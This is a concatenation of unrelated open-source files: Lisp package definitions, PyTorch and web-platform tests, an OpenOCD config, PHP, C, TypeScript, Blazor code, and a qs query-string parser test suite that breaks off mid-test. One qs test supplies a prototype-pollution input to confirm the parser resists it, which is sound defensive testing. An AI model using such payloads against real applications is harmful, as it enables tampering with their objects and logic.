#:uint32 #:int64 #:uint64 #:size-t ;; Bitmasks #:define-bitmask #:find-bitmask #:remove-bitmask #:mask-symbol-value #:mask #:mask-apply #:mask-keywords #:define-bitmask-from-constants #:define-bitmask-from-enum ;; Parsing and input #:c-include #:*c2ffi-program* ;; Debug #:*trace-c2ffi* ;; Utility #:asdf-path #:string+)) (defpackage :autowrap.minimal (:documentation "A minimal set of useful symbols for doing common things with autowrap.") (:use) (:import-from :autowrap #:ptr #:invalidate #:enum-value #:enum-key #:mask #:mask-apply #:mask-keywords #:alloc-ptr #:alloc #:calloc-ptr #:calloc #:free #:with-alloc #:with-many-alloc #:with-calloc #:memcpy #:defcallback #:callback #:inhibit-string-conversion #:autocollect #:wrapper-null-p #:sizeof #:autocollect-cancel #:with-autocollect-cancel #:making-autocollect-instance) (:export #:ptr #:invalidate #:enum-value #:enum-key #:mask #:mask-apply #:mask-keywords #:alloc-ptr #:alloc #:calloc-ptr #:calloc #:realloc #:with-alloc #:with-many-alloc #:free #:memcpy #:defcallback #:callback #:inhibit-string-conversion #:autocollect #:wrapper-null-p #:sizeof #:autocollect-cancel #:with-autocollect-cancel #:making-autocollect-instance)) (defpackage+ :autowrap.libffi (:use))
{ "pile_set_name": "Github" }
import torch import torch.nn as nn from mmaction.models import BaseHead, I3DHead, SlowFastHead, TSMHead, TSNHead class ExampleHead(BaseHead): # use a ExampleHead to success BaseHead def init_weights(self): pass def forward(self, x): pass def test_base_head(): head = ExampleHead(3, 400, dict(type='CrossEntropyLoss')) cls_scores = torch.rand((3, 4)) # When truth is non-empty then cls loss should be nonzero for random inputs gt_labels = torch.LongTensor([2] * 3).squeeze() losses = head.loss(cls_scores, gt_labels) assert 'loss_cls' in losses.keys() assert losses.get('loss_cls') > 0, 'cls loss should be non-zero' def test_i3d_head(): """Test loss method, layer construction, attributes and forward function in i3d head.""" i3d_head = I3DHead(num_classes=4, in_channels=2048) i3d_head.init_weights() assert i3d_head.num_classes == 4 assert i3d_head.dropout_ratio == 0.5 assert i3d_head.in_channels == 2048 assert i3d_head.init_std == 0.01 assert isinstance(i3d_head.dropout, nn.Dropout) assert i3d_head.dropout.p == i3d_head.dropout_ratio assert isinstance(i3d_head.fc_cls, nn.Linear) assert i3d_head.fc_cls.in_features == i3d_head.in_channels assert i3d_head.fc_cls.out_features == i3d_head.num_classes assert isinstance(i3d_head.avg_pool, nn.AdaptiveAvgPool3d) assert i3d_head.avg_pool.output_size == (1, 1, 1) input_shape = (3, 2048, 4, 7, 7) feat = torch.rand(input_shape) # i3d head inference cls_scores = i3d_head(feat) assert cls_scores.shape == torch.Size([3, 4]) def test_slowfast_head(): """Test loss method, layer construction, attributes and forward function in slowfast head.""" sf_head = SlowFastHead(num_classes=4, in_channels=2304) sf_head.init_weights() assert sf_head.num_classes == 4 assert sf_head.dropout_ratio == 0.8 assert sf_head.in_channels == 2304 assert sf_head.init_std == 0.01 assert isinstance(sf_head.dropout, nn.Dropout) assert sf_head.dropout.p == sf_head.dropout_ratio assert isinstance(sf_head.fc_cls, nn.Linear) assert sf_head.fc_cls.in_features == sf_head.in_channels assert sf_head.fc_cls.out_features == sf_head.num_classes assert isinstance(sf_head.avg_pool, nn.AdaptiveAvgPool3d) assert sf_head.avg_pool.output_size == (1, 1, 1) input_shape = (3, 2048, 32, 7, 7) feat_slow = torch.rand(input_shape) input_shape = (3, 256, 4, 7, 7) feat_fast = torch.rand(input_shape) sf_head = SlowFastHead(num_classes=4, in_channels=2304) cls_scores = sf_head((feat_slow, feat_fast)) assert cls_scores.shape == torch.Size([3, 4]) def test_tsn_head(): """Test loss method, layer construction, attributes and forward function in tsn head.""" tsn_head = TSNHead(num_classes=4, in_channels=2048) tsn_head.init_weights() assert tsn_head.num_classes == 4 assert tsn_head.dropout_ratio == 0.4 assert tsn_head.in_channels == 2048 assert tsn_head.init_std == 0.01 assert tsn_head.consensus.dim == 1 assert tsn_head.spatial_type == 'avg' assert isinstance(tsn_head.dropout, nn.Dropout) assert tsn_head.dropout.p == tsn_head.dropout_ratio assert isinstance(tsn_head.fc_cls, nn.Linear) assert tsn_head.fc_cls.in_features == tsn_head.in_channels assert tsn_head.fc_cls.out_features == tsn_head.num_classes assert isinstance(tsn_head.avg_pool, nn.AdaptiveAvgPool2d) assert tsn_head.avg_pool.output_size == (1, 1) input_shape = (8, 2048, 7, 7) feat = torch.rand(input_shape) # tsn head inference num_segs = input_shape[0] cls_scores = tsn_head(feat, num_segs) assert cls_scores.shape == torch.Size([1, 4]) # Test multi-class recognition multi_tsn_head = TSNHead( num_classes=4, in_channels=2048, loss_cls=dict(type='BCELossWithLogits', 
loss_weight=160.0), multi_class=True, label_smooth_eps=0.01) multi_tsn_head.init_weights() assert multi_tsn_head.num_classes == 4 assert multi_tsn_head.dropout_ratio == 0.4 assert multi_tsn_head.in_channels == 2048 assert multi_tsn_head.init_std == 0.01 assert multi_tsn_head.consensus.dim == 1 assert isinstance(multi_tsn_head.dropout, nn.Dropout) assert multi_tsn_head.dropout.p == multi_tsn_head.dropout_ratio assert isinstance(multi_tsn_head.fc_cls, nn.Linear) assert multi_tsn_head.fc_cls.in_features == multi_tsn_head.in_channels assert multi_tsn_head.fc_cls.out_features == multi_tsn_head.num_classes assert isinstance(multi_tsn_head.avg_pool, nn.AdaptiveAvgPool2d) assert multi_tsn_head.avg_pool.output_size == (1, 1) input_shape = (8, 2048, 7, 7) feat = torch.rand(input_shape) # multi-class tsn head inference num_segs = input_shape[0] cls_scores = tsn_head(feat, num_segs) assert cls_scores.shape == torch.Size([1, 4]) def test_tsm_head(): """Test loss method, layer construction, attributes and forward function in tsm head.""" tsm_head = TSMHead(num_classes=4, in_channels=2048) tsm_head.init_weights() assert tsm_head.num_classes == 4 assert tsm_head.dropout_ratio == 0.8 assert tsm_head.in_channels == 2048 assert tsm_head.init_std == 0.001 assert tsm_head.consensus.dim == 1 assert tsm_head.spatial_type == 'avg' assert isinstance(tsm_head.dropout, nn.Dropout) assert tsm_head.dropout.p == tsm_head.dropout_ratio assert isinstance(tsm_head.fc_cls, nn.Linear) assert tsm_head.fc_cls.in_features == tsm_head.in_channels assert tsm_head.fc_cls.out_features == tsm_head.num_classes assert isinstance(tsm_head.avg_pool, nn.AdaptiveAvgPool2d) assert tsm_head.avg_pool.output_size == 1 input_shape = (8, 2048, 7, 7) feat = torch.rand(input_shape) # tsm head inference with no init num_segs = input_shape[0] cls_scores = tsm_head(feat, num_segs) assert cls_scores.shape == torch.Size([1, 4]) # tsm head inference with init tsm_head = TSMHead(num_classes=4, in_channels=2048, temporal_pool=True) tsm_head.init_weights() cls_scores = tsm_head(feat, num_segs) assert cls_scores.shape == torch.Size([2, 4])
{ "pile_set_name": "Github" }
#
# TI MSP432 LaunchPad Evaluation Kit
#
source [find interface/xds110.cfg]

adapter_khz 2500

transport select swd

source [find target/ti_msp432.cfg]
{ "pile_set_name": "Github" }
<?php /** * Copyright 2014 Fabian Grutschus. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * The views and conclusions contained in the software and documentation are those * of the authors and should not be interpreted as representing official policies, * either expressed or implied, of the copyright holders. * * @author Fabian Grutschus <[email protected]> * @copyright 2014 Fabian Grutschus. All rights reserved. * @license BSD * @link http://github.com/fabiang/xmpp */ namespace Fabiang\Xmpp\Integration; use Behat\Behat\Context\BehatContext; class BindContext extends BehatContext { /** * @Given /^Test response data for bind$/ */ public function testResponseDataForBind() { $this->getConnection()->setData(array( "<?xml version='1.0'?>" . "<stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams'>", "<stream:features><bind xmlns='urn:ietf:params:xml:ns:xmpp-bind'/></stream:features>", "<iq id='fabiang_xmpp_1234' type='result'><bind xmlns='urn:ietf:params:xml:ns:xmpp-bind'>" . "<jid>[email protected]/12345678890</jid></bind></iq>" )); } /** * @Then /^request for binding send$/ */ public function requestForBindingSend() { $buffer = $this->getConnection()->getBuffer(); assertRegExp( '#^<iq type="set" id="fabiang_xmpp_[^"]+">' . '<bind xmlns="urn:ietf:params:xml:ns:xmpp-bind">' . '<resource></resource></bind></iq>$#', $buffer[1] ); } /** * @Given /^Jid is set to options object$/ */ public function jidIsSetToOptionsObject() { assertSame('[email protected]/12345678890', $this->getConnection()->getOptions()->getJid()); } /** * * @return \Fabiang\Xmpp\Connection\Test */ public function getConnection() { return $this->getMainContext()->getConnection(); } }
{ "pile_set_name": "Github" }
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

in_addr_t inet_addr(const char *p)
{
	struct in_addr a;
	if (!__inet_aton(p, &a)) return -1;
	return a.s_addr;
}
{ "pile_set_name": "Github" }
<!DOCTYPE html> <meta charset="UTF-8"> <style> .layer-reference { position: absolute; height: 300px; width: 50px; background-color: lightgrey; font-family: sans-serif; text-align: center; padding-top: 5px; border: 1px solid; } .target { position: absolute; width: 450px; height: 10px; } .active { background-color: black; } .replica { background-color: green; } .spacer { height: 350px; } </style> <body> <div class="spacer"></div> <script src="/resources/testharness.js"></script> <script src="/resources/testharnessreport.js"></script> <script src="resources/interpolation-test.js"></script> <script> [-8, -5, -2, 1, 5, 10, 12].forEach(function(zIndex, i) { var layerReference = document.createElement('div'); layerReference.classList.add('layer-reference'); layerReference.style.zIndex = zIndex; layerReference.style.top = '0px'; layerReference.style.left = 50 + (i * 50) + 'px'; layerReference.textContent = 'Z ' + zIndex; document.body.appendChild(layerReference); }); assertInterpolation({ property: 'z-index', from: '-5', to: '5' }, [ {at: -0.3, is: '-8'}, {at: 0, is: '-5'}, {at: 0.3, is: '-2'}, {at: 0.6, is: '1'}, {at: 1, is: '5'}, {at: 1.5, is: '10'}, ]); afterTest(function() { var actives = document.querySelectorAll('.active'); var replicas = document.querySelectorAll('.replica'); for (var i = 0; i < actives.length; i++) { actives[i].style.top = 50 + (i * 40) + 'px'; replicas[i].style.top = 60 + (i * 40) + 'px'; } }); </script> </body>
{ "pile_set_name": "Github" }
{ "ver": "1.0.0", "uuid": "96a64ce0-ccbb-49ac-aca5-537d61b47f14", "type": "sprite", "wrapMode": "clamp", "filterMode": "bilinear", "subMetas": { "hall": { "ver": "1.0.3", "uuid": "91f4ddb4-d0d0-4d93-9671-c062b109acd5", "rawTextureUuid": "96a64ce0-ccbb-49ac-aca5-537d61b47f14", "trimType": "auto", "trimThreshold": 1, "rotated": false, "offsetX": 0, "offsetY": 0, "trimX": 2, "trimY": 2, "width": 1004, "height": 622, "rawWidth": 1008, "rawHeight": 626, "borderTop": 0, "borderBottom": 0, "borderLeft": 0, "borderRight": 0, "subMetas": {} } } }
{ "pile_set_name": "Github" }
export type MatchingSpecs<P> = Partial< { [K in keyof P]: P[K] extends unknown[] ? | Specification<P[K][number][]> | Readonly< | P[K][number] | Specification<P[K][number]> | MatchingSpecs<P[K][number]> >[] : P[K] extends object ? MatchingSpecs<P[K]> : P[K] | Specification<P[K]> | Specification<NonNullable<P[K]>> } > export type Assert = { equal(actual: any, expected: any, msg?: string): void deepEqual(actual: any, expected: any, msg?: string): void } type Annotations = { $topic?: string $spec?: string $description?: string } export type Specifications<P> = Annotations & MatchingSpecs<P> export type Specification<T> = Annotations & { (val: T): boolean } export type SpokFunction = <T>( t: Assert, obj: T, specifications: Specifications<T>, prefix?: string | null ) => void export type SpokFunctionAny = <P extends object, T>( t: Assert, obj: T, specifications: P, prefix?: string | null ) => void export type SpokConfig = { printSpec: boolean printDescription: boolean sound: boolean color: boolean } export type SpokAssertions = { gtz: Specification<number> gez: Specification<number> ltz: Specification<number> lez: Specification<number> array: Specification<unknown[]> number: Specification<unknown> string: Specification<unknown> function: Specification<unknown> definedObject: Specification<unknown> defined: Specification<unknown> notDefined: Specification<unknown> range(min: number, max: number): Specification<number> gt(x: number): Specification<number> ge(x: number): Specification<number> lt(x: number): Specification<number> le(x: number): Specification<number> ne(x: unknown): Specification<unknown> type(x: string): Specification<unknown> arrayElements(n: number): Specification<unknown[]> arrayElementsRange(min: number, max: number): Specification<unknown[]> startsWith(what: string): Specification<string> endsWith(what: string): Specification<string> test(regex: RegExp): Specification<string> } export type Spok = SpokFunction & SpokAssertions & SpokConfig & { any: SpokFunctionAny }
{ "pile_set_name": "Github" }
@page "/pdf/portfolio" @inject Microsoft.JSInterop.IJSRuntime JS @using System.IO @using Syncfusion.Blazor.Buttons @inject Microsoft.AspNetCore.Hosting.IWebHostEnvironment hostingEnvironment @inherits SampleBaseComponent; @*Hidden:Lines*@ @using blazor_samples.Data.FileFormats.PDF @*End:Hidden*@ <SampleDescription> <p>This sample demonstrates how to create portfolio in the PDF document. You can also extract and remove files from the PDF portfolio. This feature allows the user to bring content together from variety of sources including documents, drawings, images, emails, spreadsheets, and web pages.</p> </SampleDescription> <ActionDescription> <p>More information about the portfolio can be found in this documentation <a target='_blank' href='https://help.syncfusion.com/file-formats/pdf/working-with-portfolio'>section.</a></p> </ActionDescription> <div class="control-section"> <p style="font-weight:normal">Click the button to view a PDF document generated by Essential PDF. Please note that Adobe Reader or its equivalent is required to view the resultant document. </p> <div class="button-section"> <div id="button-control"> <div class="row"> <div> <SfButton @onclick="GeneratePDF">Generate PDF</SfButton> </div> </div> </div> </div> </div> <style> .radio-control { margin: 0 0 5% 0; } .control-section .row { margin: 10px 0; } </style> @code { /// <summary> /// Create and download the simple PDF document ///<summary> protected async void GeneratePDF(MouseEventArgs args) { PortfolioService service = new PortfolioService(hostingEnvironment); MemoryStream documentStream = service.CreatePdfDocument(); await JS.SaveAs("Portfolio.pdf", documentStream.ToArray()); } }
{ "pile_set_name": "Github" }
/* eslint no-extend-native:0 */ // Load modules var Code = require('code'); var Lab = require('lab'); var Qs = require('../'); // Declare internals var internals = {}; // Test shortcuts var lab = exports.lab = Lab.script(); var expect = Code.expect; var describe = lab.experiment; var it = lab.test; describe('parse()', function () { it('parses a simple string', function (done) { expect(Qs.parse('0=foo')).to.deep.equal({ '0': 'foo' }); expect(Qs.parse('foo=c++')).to.deep.equal({ foo: 'c ' }); expect(Qs.parse('a[>=]=23')).to.deep.equal({ a: { '>=': '23' } }); expect(Qs.parse('a[<=>]==23')).to.deep.equal({ a: { '<=>': '=23' } }); expect(Qs.parse('a[==]=23')).to.deep.equal({ a: { '==': '23' } }); expect(Qs.parse('foo', { strictNullHandling: true })).to.deep.equal({ foo: null }); expect(Qs.parse('foo' )).to.deep.equal({ foo: '' }); expect(Qs.parse('foo=')).to.deep.equal({ foo: '' }); expect(Qs.parse('foo=bar')).to.deep.equal({ foo: 'bar' }); expect(Qs.parse(' foo = bar = baz ')).to.deep.equal({ ' foo ': ' bar = baz ' }); expect(Qs.parse('foo=bar=baz')).to.deep.equal({ foo: 'bar=baz' }); expect(Qs.parse('foo=bar&bar=baz')).to.deep.equal({ foo: 'bar', bar: 'baz' }); expect(Qs.parse('foo2=bar2&baz2=')).to.deep.equal({ foo2: 'bar2', baz2: '' }); expect(Qs.parse('foo=bar&baz', { strictNullHandling: true })).to.deep.equal({ foo: 'bar', baz: null }); expect(Qs.parse('foo=bar&baz')).to.deep.equal({ foo: 'bar', baz: '' }); expect(Qs.parse('cht=p3&chd=t:60,40&chs=250x100&chl=Hello|World')).to.deep.equal({ cht: 'p3', chd: 't:60,40', chs: '250x100', chl: 'Hello|World' }); done(); }); it('allows enabling dot notation', function (done) { expect(Qs.parse('a.b=c')).to.deep.equal({ 'a.b': 'c' }); expect(Qs.parse('a.b=c', { allowDots: true })).to.deep.equal({ a: { b: 'c' } }); done(); }); it('parses a single nested string', function (done) { expect(Qs.parse('a[b]=c')).to.deep.equal({ a: { b: 'c' } }); done(); }); it('parses a double nested string', function (done) { expect(Qs.parse('a[b][c]=d')).to.deep.equal({ a: { b: { c: 'd' } } }); done(); }); it('defaults to a depth of 5', function (done) { expect(Qs.parse('a[b][c][d][e][f][g][h]=i')).to.deep.equal({ a: { b: { c: { d: { e: { f: { '[g][h]': 'i' } } } } } } }); done(); }); it('only parses one level when depth = 1', function (done) { expect(Qs.parse('a[b][c]=d', { depth: 1 })).to.deep.equal({ a: { b: { '[c]': 'd' } } }); expect(Qs.parse('a[b][c][d]=e', { depth: 1 })).to.deep.equal({ a: { b: { '[c][d]': 'e' } } }); done(); }); it('parses a simple array', function (done) { expect(Qs.parse('a=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); done(); }); it('parses an explicit array', function (done) { expect(Qs.parse('a[]=b')).to.deep.equal({ a: ['b'] }); expect(Qs.parse('a[]=b&a[]=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[]=b&a[]=c&a[]=d')).to.deep.equal({ a: ['b', 'c', 'd'] }); done(); }); it('parses a mix of simple and explicit arrays', function (done) { expect(Qs.parse('a=b&a[]=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[]=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[0]=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a=b&a[0]=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[1]=b&a=c')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a=b&a[1]=c')).to.deep.equal({ a: ['b', 'c'] }); done(); }); it('parses a nested array', function (done) { expect(Qs.parse('a[b][]=c&a[b][]=d')).to.deep.equal({ a: { b: ['c', 'd'] } }); expect(Qs.parse('a[>=]=25')).to.deep.equal({ a: { '>=': '25' } }); done(); }); 
it('allows to specify array indices', function (done) { expect(Qs.parse('a[1]=c&a[0]=b&a[2]=d')).to.deep.equal({ a: ['b', 'c', 'd'] }); expect(Qs.parse('a[1]=c&a[0]=b')).to.deep.equal({ a: ['b', 'c'] }); expect(Qs.parse('a[1]=c')).to.deep.equal({ a: ['c'] }); done(); }); it('limits specific array indices to 20', function (done) { expect(Qs.parse('a[20]=a')).to.deep.equal({ a: ['a'] }); expect(Qs.parse('a[21]=a')).to.deep.equal({ a: { '21': 'a' } }); done(); }); it('supports keys that begin with a number', function (done) { expect(Qs.parse('a[12b]=c')).to.deep.equal({ a: { '12b': 'c' } }); done(); }); it('supports encoded = signs', function (done) { expect(Qs.parse('he%3Dllo=th%3Dere')).to.deep.equal({ 'he=llo': 'th=ere' }); done(); }); it('is ok with url encoded strings', function (done) { expect(Qs.parse('a[b%20c]=d')).to.deep.equal({ a: { 'b c': 'd' } }); expect(Qs.parse('a[b]=c%20d')).to.deep.equal({ a: { b: 'c d' } }); done(); }); it('allows brackets in the value', function (done) { expect(Qs.parse('pets=["tobi"]')).to.deep.equal({ pets: '["tobi"]' }); expect(Qs.parse('operators=[">=", "<="]')).to.deep.equal({ operators: '[">=", "<="]' }); done(); }); it('allows empty values', function (done) { expect(Qs.parse('')).to.deep.equal({}); expect(Qs.parse(null)).to.deep.equal({}); expect(Qs.parse(undefined)).to.deep.equal({}); done(); }); it('transforms arrays to objects', function (done) { expect(Qs.parse('foo[0]=bar&foo[bad]=baz')).to.deep.equal({ foo: { '0': 'bar', bad: 'baz' } }); expect(Qs.parse('foo[bad]=baz&foo[0]=bar')).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo[bad]=baz&foo[]=bar')).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo[]=bar&foo[bad]=baz')).to.deep.equal({ foo: { '0': 'bar', bad: 'baz' } }); expect(Qs.parse('foo[bad]=baz&foo[]=bar&foo[]=foo')).to.deep.equal({ foo: { bad: 'baz', '0': 'bar', '1': 'foo' } }); expect(Qs.parse('foo[0][a]=a&foo[0][b]=b&foo[1][a]=aa&foo[1][b]=bb')).to.deep.equal({ foo: [{ a: 'a', b: 'b' }, { a: 'aa', b: 'bb' }] }); expect(Qs.parse('a[]=b&a[t]=u&a[hasOwnProperty]=c')).to.deep.equal({ a: { '0': 'b', t: 'u', c: true } }); expect(Qs.parse('a[]=b&a[hasOwnProperty]=c&a[x]=y')).to.deep.equal({ a: { '0': 'b', '1': 'c', x: 'y' } }); done(); }); it('transforms arrays to objects (dot notation)', function (done) { expect(Qs.parse('foo[0].baz=bar&fool.bad=baz', { allowDots: true })).to.deep.equal({ foo: [{ baz: 'bar' }], fool: { bad: 'baz' } }); expect(Qs.parse('foo[0].baz=bar&fool.bad.boo=baz', { allowDots: true })).to.deep.equal({ foo: [{ baz: 'bar' }], fool: { bad: { boo: 'baz' } } }); expect(Qs.parse('foo[0][0].baz=bar&fool.bad=baz', { allowDots: true })).to.deep.equal({ foo: [[{ baz: 'bar' }]], fool: { bad: 'baz' } }); expect(Qs.parse('foo[0].baz[0]=15&foo[0].bar=2', { allowDots: true })).to.deep.equal({ foo: [{ baz: ['15'], bar: '2' }] }); expect(Qs.parse('foo[0].baz[0]=15&foo[0].baz[1]=16&foo[0].bar=2', { allowDots: true })).to.deep.equal({ foo: [{ baz: ['15', '16'], bar: '2' }] }); expect(Qs.parse('foo.bad=baz&foo[0]=bar', { allowDots: true })).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo.bad=baz&foo[]=bar', { allowDots: true })).to.deep.equal({ foo: { bad: 'baz', '0': 'bar' } }); expect(Qs.parse('foo[]=bar&foo.bad=baz', { allowDots: true })).to.deep.equal({ foo: { '0': 'bar', bad: 'baz' } }); expect(Qs.parse('foo.bad=baz&foo[]=bar&foo[]=foo', { allowDots: true })).to.deep.equal({ foo: { bad: 'baz', '0': 'bar', '1': 'foo' } }); 
expect(Qs.parse('foo[0].a=a&foo[0].b=b&foo[1].a=aa&foo[1].b=bb', { allowDots: true })).to.deep.equal({ foo: [{ a: 'a', b: 'b' }, { a: 'aa', b: 'bb' }] }); done(); }); it('can add keys to objects', function (done) { expect(Qs.parse('a[b]=c&a=d')).to.deep.equal({ a: { b: 'c', d: true } }); done(); }); it('correctly prunes undefined values when converting an array to an object', function (done) { expect(Qs.parse('a[2]=b&a[99999999]=c')).to.deep.equal({ a: { '2': 'b', '99999999': 'c' } }); done(); }); it('supports malformed uri characters', function (done) { expect(Qs.parse('{%:%}', { strictNullHandling: true })).to.deep.equal({ '{%:%}': null }); expect(Qs.parse('{%:%}=')).to.deep.equal({ '{%:%}': '' }); expect(Qs.parse('foo=%:%}')).to.deep.equal({ foo: '%:%}' }); done(); }); it('doesn\'t produce empty keys', function (done) { expect(Qs.parse('_r=1&')).to.deep.equal({ '_r': '1' }); done(); }); it('cannot access Object prototype', function (done) { Qs.parse('constructor[prototype][bad]=bad'); Qs.parse('bad[constructor][prototype][bad]=bad'); expect(typeof Object.prototype.bad).to.equal('undefined'); done(); }); it('parses arrays of objects', function (done) { expect(Qs.parse('a[][b]=c')).to.deep.equal({ a: [{ b: 'c' }] }); expect(Qs.parse('a[0][b]=c')).to.deep.equal({ a: [{ b: 'c' }] }); done(); }); it('allows for empty strings in arrays', function (done) { expect(Qs.parse('a[]=b&a[]=&a[]=c')).to.deep.equal({ a: ['b', '', 'c'] }); expect(Qs.parse('a[0]=b&a[1]&a[2]=c&a[19]=', { strictNullHandling: true, arrayLimit: 20 })).to.deep.equal({ a: ['b', null, 'c', ''] }); expect(Qs.parse('a[]=b&a[]&a[]=c&a[]=', { strictNullHandling: true, arrayLimit: 0 })).to.deep.equal({ a: ['b', null, 'c', ''] }); expect(Qs.parse('a[0]=b&a[1]=&a[2]=c&a[19]', { strictNullHandling: true, arrayLimit: 20 })).to.deep.equal({ a: ['b', '', 'c', null] }); expect(Qs.parse('a[]=b&a[]=&a[]=c&a[]', { strictNullHandling: true, arrayLimit: 0 })).to.deep.equal({ a: ['b', '', 'c', null] }); expect(Qs.parse('a[]=&a[]=b&a[]=c')).to.deep.equal({ a: ['', 'b', 'c'] }); done(); }); it('compacts sparse arrays', function (done) { expect(Qs.parse('a[10]=1&a[2]=2')).to.deep.equal({ a: ['2', '1'] }); done(); }); it('parses semi-parsed strings', function (done) { expect(Qs.parse({ 'a[b]': 'c' })).to.deep.equal({ a: { b: 'c' } }); expect(Qs.parse({ 'a[b]': 'c', 'a[d]': 'e' })).to.deep.equal({ a: { b: 'c', d: 'e' } }); done(); }); it('parses buffers correctly', function (done) { var b = new Buffer('test'); expect(Qs.parse({ a: b })).to.deep.equal({ a: b }); done(); }); it('continues parsing when no parent is found', function (done) { expect(Qs.parse('[]=&a=b')).to.deep.equal({ '0': '', a: 'b' }); expect(Qs.parse('[]&a=b', { strictNullHandling: true })).to.deep.equal({ '0': null, a: 'b' }); expect(Qs.parse('[foo]=bar')).to.deep.equal({ foo: 'bar' }); done(); }); it('does not error when parsing a very long array', function (done) { var str = 'a[]=a'; while (Buffer.byteLength(str) < 128 * 1024) { str += '&' + str; } expect(function () { Qs.parse(str); }).to.not.throw(); done(); }); it('should not throw when a native prototype has an enumerable property', { parallel: false }, function (done) { Object.prototype.crash = ''; Array.prototype.crash = ''; expect(Qs.parse.bind(null, 'a=b')).to.not.throw(); expect(Qs.parse('a=b')).to.deep.equal({ a: 'b' }); expect(Qs.parse.bind(null, 'a[][b]=c')).to.not.throw(); expect(Qs.parse('a[][b]=c')).to.deep.equal({ a: [{ b: 'c' }] }); delete Object.prototype.crash; delete Array.prototype.crash; done(); }); it('parses 
a string with an alternative string delimiter', function (done) { expect(Qs.parse('a=b;c=d', { delimiter: ';' })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('parses a string with an alternative RegExp delimiter', function (done) { expect(Qs.parse('a=b; c=d', { delimiter: /[;,] */ })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('does not use non-splittable objects as delimiters', function (done) { expect(Qs.parse('a=b&c=d', { delimiter: true })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('allows overriding parameter limit', function (done) { expect(Qs.parse('a=b&c=d', { parameterLimit: 1 })).to.deep.equal({ a: 'b' }); done(); }); it('allows setting the parameter limit to Infinity', function (done) { expect(Qs.parse('a=b&c=d', { parameterLimit: Infinity })).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('allows overriding array limit', function (done) { expect(Qs.parse('a[0]=b', { arrayLimit: -1 })).to.deep.equal({ a: { '0': 'b' } }); expect(Qs.parse('a[-1]=b', { arrayLimit: -1 })).to.deep.equal({ a: { '-1': 'b' } }); expect(Qs.parse('a[0]=b&a[1]=c', { arrayLimit: 0 })).to.deep.equal({ a: { '0': 'b', '1': 'c' } }); done(); }); it('allows disabling array parsing', function (done) { expect(Qs.parse('a[0]=b&a[1]=c', { parseArrays: false })).to.deep.equal({ a: { '0': 'b', '1': 'c' } }); done(); }); it('parses an object', function (done) { var input = { 'user[name]': { 'pop[bob]': 3 }, 'user[email]': null }; var expected = { 'user': { 'name': { 'pop[bob]': 3 }, 'email': null } }; var result = Qs.parse(input); expect(result).to.deep.equal(expected); done(); }); it('parses an object in dot notation', function (done) { var input = { 'user.name': { 'pop[bob]': 3 }, 'user.email.': null }; var expected = { 'user': { 'name': { 'pop[bob]': 3 }, 'email': null } }; var result = Qs.parse(input, { allowDots: true }); expect(result).to.deep.equal(expected); done(); }); it('parses an object and not child values', function (done) { var input = { 'user[name]': { 'pop[bob]': { 'test': 3 } }, 'user[email]': null }; var expected = { 'user': { 'name': { 'pop[bob]': { 'test': 3 } }, 'email': null } }; var result = Qs.parse(input); expect(result).to.deep.equal(expected); done(); }); it('does not blow up when Buffer global is missing', function (done) { var tempBuffer = global.Buffer; delete global.Buffer; var result = Qs.parse('a=b&c=d'); global.Buffer = tempBuffer; expect(result).to.deep.equal({ a: 'b', c: 'd' }); done(); }); it('does not crash when parsing circular references', function (done) { var a = {}; a.b = a; var parsed; expect(function () { parsed = Qs.parse({ 'foo[bar]': 'baz', 'foo[baz]': a }); }).to.not.throw(); expect(parsed).to.contain('foo'); expect(parsed.foo).to.contain('bar', 'baz'); expect(parsed.foo.bar).to.equal('baz'); expect(parsed.foo.baz).to.deep.equal(a); done(); }); it('parses plain objects correctly', function (done) { var a = Object.create(null); a.b = 'c'; expect(Qs.parse(a)).to.deep.equal({ b: 'c' }); var result = Qs.parse({ a: a }); expect(result).to.contain('a'); expect(result.a).to.deep.equal(a); done(); }); it('parses dates correctly', function (done) { var now = new Date(); expect(Qs.parse({ a: now })).to.deep.equal({ a: now }); done(); }); it('parses regular expressions correctly', function (done) { var re = /^test$/; expect(Qs.parse({ a: re })).to.deep.equal({ a: re }); done(); }); it('can allow overwriting prototype properties', function (done) { expect(Qs.parse('a[hasOwnProperty]=b', { allowPrototypes: true })).to.deep.equal({ a: { 